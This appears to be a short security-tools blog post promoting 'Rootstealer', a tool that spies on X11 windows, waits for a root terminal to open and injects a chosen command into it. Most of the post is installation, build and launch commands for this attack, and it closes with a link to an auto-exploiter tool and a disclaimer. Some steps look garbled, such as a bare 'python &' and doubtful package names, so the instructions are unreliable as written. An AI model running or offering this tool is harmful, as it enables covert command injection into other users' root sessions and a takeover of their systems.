Rootstealer – Trick To Inject Commands On Root Terminal


Rootstealer is an example of new attack using X11. This tool is used to detect when linux users open terminal with root and inject command with X11 lib.

Rootstealer Installation

# apt-get install libX11-dev libxtst-dev
# cd rootstealer/sendkeys; 

Edit file rootstealer/cmd.cfg and write your command to inject.

You can take that following:

# make; cd ..    #to back to path rootstealer/ 
# pip install gi
# pip install gir

Run the python script to spy all windows gui and search window with “root@” string in title.

$ python &
$ sudo apt-get install libwnck-dev
$ gcc -o rootstealer rootstealer.c `pkg-config --cflags --libs libwnck-1.0` -DWNCK_I_KNOW_THIS_IS_UNSTABLE -DWNCK_COMPILATION
$ ./rootstealer &

Also Read XAttacker – Website Vulnerability Scanner & Auto Exploiter Tool



We are not responsible for the evil use of that tool. Use that for a good purpose.